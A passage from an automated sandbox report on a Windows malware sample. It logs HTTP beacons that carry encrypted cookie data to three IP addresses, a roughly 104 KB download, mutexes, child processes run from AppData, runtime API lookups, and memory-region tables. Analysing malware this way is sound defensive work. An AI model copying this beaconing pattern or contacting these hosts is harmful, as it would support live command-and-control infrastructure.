|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Network Behavior
HTTP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 1015 bytes |
| Total Data Received | 101.78 KB |
| Contacted Host Count | 3 |
| Contacted Hosts | 72.48.172.106, 201.120.89.60, 47.32.209.86 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 72.48.172.106 |
| Server Port | 80 |
| Data Sent | 339 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 72.48.172.106, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 63135=cpR27Z0W6wSqTdU55SM0vzLVl10b7CEhoLLXJ7rg7n09ump5SnZuNPprzcEmh8PIvW5T82l/+KqztOKteEpEbT7k+7DOWW8eFFG23uwyu7G/hEXrJdLbCsbbCIVIp+QTnF7jfgHOvbn8hH8tZKGdXJbKfvFKkn48+wU1zpr9Tm1+NbWtcelXBdz/CSq6ayYAXrYMAA7JkCWV6wHPDNlsnhp6dx+/YVUw+5eJPgiiSwLeNCbYqPJhgBAve80KBWBtjYttA+b+R2POHwbV2ILw1J4eN1xIvXcgrGiHG0txs/lRSkL5vRHs+10ji+PXYBguZ0dOYaE/kXM9V8AAoC7NCqedxCY/6FWfHQM6wwzQJ2OIw12V6RjSqZ4HK9rSL7yGunazEozCpd6MNVnZUEJV2mIl7Cfu/tlkGwDlApdq00myhjqR8myV1dN0Ib+5Y+WB20Bl77CzRTOWe7brkdUNqnfmMV3/4klesdv+yKj+TZ+rTBN3A1AvlKydZ7cDjuNpyQhMfKHvR1ejm7c800wzSDemfMEaT51GxGqh+0hzKI1vCE21y81MjbFpGJRIDhocZBB3NxlRwG2ya/4Dm4e1IG/aeqKQZigXUQN7KFU8u7Cd+/rPjaLQ5JwJHgSnhJCoZSD6go6oucT8dVXYGjctBu2QBnqH65MHgJZII6bFVVRIT65Tkmg7+X7vu1xaghPy0acsBQ==, url = 72.48.172.106 |
|
1 | |
| Close Session | - |
|
3 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 201.120.89.60 |
| Server Port | 8443 |
| Data Sent | 339 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 201.120.89.60, server_port = 8443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 19222=cPho/Gu3sN8VxQkd7D6JnUNBVxJApz5irkmsiarY88OjoekJJGh/yc4BgXEZR4hgwSTdqoQa1I+RqfmR49VpA6CBFye7fypDn6ObrFcTtTntAfE+hw07126eEt2q/13ZQByIAJCGqHTGG0u18rZfkhEtPjn1ZnL9OOlTSZWw/4vCWlVsBQ62V8az1RcJEpNHqmLRXQ9Gh54VX0dh4q98msI0ova8i8it5c+xMc1aL9IAPlpgHc/s4cZVotln1Z73KaNceO4ifOQNsasyyOB8++VqSNXHvxqAaJ9xRkWyOcN4Qh5bmAZuERTqOmdpFdI1ybrbzdFebPeK5fywe+tZRwn6wG9P5vXk0Cjxcs+4jaGfgz9k0vbroryznlR8qmlGH1EO9bH9t5CXEp3jbBg+rb5QaiMZeEHkpcCuedVq4ggvFN8rsz2XZOohzET85E8QZS6dSI3cMiz6g2Q9Z1Z3ol6AcMxakokyiqqZSyMT3pwERnBVf3JsGEcYB9+bbCGwuSMhnttMoNnVvDcSnLxpeU/BZebvfrYLFM82NvpnJYyuDkZCHGu6iW0UqT3GDjRsnIxGmH0omRlZqbP5/9u7GTNBVhOz+RaClDIswmS9sj/yvW6pFU0GdaneM8nB7+PveqRQXgi/vscy7yb28rMzKWyzTNYdL1ZmTuSrOpyj86jGyQ69hkp1l0rVTG6fiQmfpjxXLA==, url = 201.120.89.60 |
|
1 | |
| Close Session | - |
|
3 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 47.32.209.86 |
| Server Port | 80 |
| Data Sent | 337 |
| Data Received | 104220 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 47.32.209.86, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 40329=AsQ924S2Ql/bQV3KgH/XlJGx+v18kOdoVhOOnejV29ThSS80m6OesCMoitkyaUGxJrnAw5vniZqLhRe6ZOmjIdspTHk2ht/1nUchvyWRru4+GiB096gzfjZjEFlw+tTAQByIAJCGqHTGG0u18rZfkhEtPjn1ZnL9OOlTSZWw/4vCWlVsBQ62V8az1RcJEpNHqmLRXQ9Gh54VX0dh4q98msI0ova8i8it5c+xMc1aL9IAPlpgHc/s4cZVotln1Z73KaNceO4ifOQNsasyyOB8++VqSNXHvxqAaJ9xRkWyOcN4Qh5bmAZuERTqOmdpFdI1ybrbzdFebPeK5fywe+tZRwn6wG9P5vXk0Cjxcs+4jaGfgz9k0vbroryznlR8qmlGH1EO9bH9t5CXEp3jbBg+rb5QaiMZeEHkpcCuedVq4ggvFN8rsz2XZOohzET85E8QZS6dSI3cMiz6g2Q9Z1Z3ol6AcMxakokyiqqZSyMT3pwERnBVf3JsGEcYB9+bbCGwuSMhnttMoNnVvDcSnLxpeU/BZebvfrYLFM82NvpnJYyuDkZCHGu6iW0UqT3GDjRsnIxGmH0omRlZqbP5/9u7GTNBVhOz+RaClDIswmS9sj/yvW6pFU0GdaneM8nB7+PveqRQXgi/vscy7yb28rMzKWyzTNYdL1ZmTuSrOpyj86jGyQ69hkp1l0rVTG6fiQmfpjxXLA==, url = 47.32.209.86 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 104212, size_out = 104212 |
|
1 | |
| Close Session | - |
|
3 |
Process #10: txcuqb4avhqptpy.exe
159
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\txcuqb4avhqptpy.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\TXCuQB4avHqPTPy.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:03:06, Reason: Child Process |
| Unmonitor | End Time: 00:03:08, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x744 |
| Parent PID | 0x2b4 (c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
654
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00247fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00268fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00288fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x00337fff | Private Memory | rwx |
|
|
|
- |
| txcuqb4avhqptpy.exe | 0x00400000 | 0x0042dfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001da0000 | 0x01da0000 | 0x02192fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002330000 | 0x02330000 | 0x0233ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02340000 | 0x0260efff | Memory Mapped File | r |
|
|
|
- |
| winspool.drv | 0x74c40000 | 0x74c90fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x74ca0000 | 0x74cd1fff | Memory Mapped File | rwx |
|
|
|
- |
| msacm32.dll | 0x74ce0000 | 0x74cf3fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (39)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = file_type |
|
39 |
Module (34)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ntdll.dll | base_address = 0x77e20000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x76a70000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77820000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x18fe2c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd80 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memcpy, address_out = 0x77e42340 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetStockObject, address_out = 0x76a84eb8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7623110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcA, address_out = 0x77e624e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7784ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x77837809 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x77837bbb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageA, address_out = 0x77837bd3 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadIconA, address_out = 0x7783dafb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorA, address_out = 0x7783dad5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x77837d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadImageA, address_out = 0x77848455 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExA, address_out = 0x7783db98 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExA, address_out = 0x7783d22e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ShowWindow, address_out = 0x77840dfb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = UpdateWindow, address_out = 0x77843559 |
|
1 |
System (86)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Ticks, time = 239383 |
|
50 | |
| Get Time | type = Ticks, time = 239399 |
|
36 |
Process #11: txcuqb4avhqptpy.exe
190
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\txcuqb4avhqptpy.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\TXCuQB4avHqPTPy.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:03:07, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x660 |
| Parent PID | 0x744 (c:\users\aetadzjz\appdata\local\microsoft\windows\txcuqb4avhqptpy.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7CC
0x
8D4
0x
12C
0x
5FC
0x
5A8
0x
C0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002c7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002e8fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| txcuqb4avhqptpy.exe | 0x00400000 | 0x0042dfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x00448fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x00467fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x01bdffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001be0000 | 0x01be0000 | 0x01fd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001fe0000 | 0x01fe0000 | 0x020befff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000020c0000 | 0x020c0000 | 0x020ebfff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000020c0000 | 0x020c0000 | 0x020c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x020d0000 | 0x020d0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000020d0000 | 0x020d0000 | 0x020d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000020e0000 | 0x020e0000 | 0x020e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x020fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02100000 | 0x023cefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0252ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x024cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000024d0000 | 0x024d0000 | 0x024d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x024e0000 | 0x024e3fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x024e0000 | 0x024e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x0252ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x0256ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002570000 | 0x02570000 | 0x0266ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02670000 | 0x0268ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002690000 | 0x02690000 | 0x02690fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x027a0000 | 0x027cffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x027d0000 | 0x027d3fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x027e0000 | 0x02845fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002850000 | 0x02850000 | 0x02850fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x029cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029d0000 | 0x029d0000 | 0x02acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| winspool.drv | 0x74c40000 | 0x74c90fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x74ca0000 | 0x74cd1fff | Memory Mapped File | rwx |
|
|
|
- |
| msacm32.dll | 0x74ce0000 | 0x74cf3fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x753d0000 | 0x754c4fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75540000 | 0x7557afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75580000 | 0x75595fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x755a0000 | 0x755c0fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x755d0000 | 0x7576dfff | Memory Mapped File | rwx |
|
|
|
- |
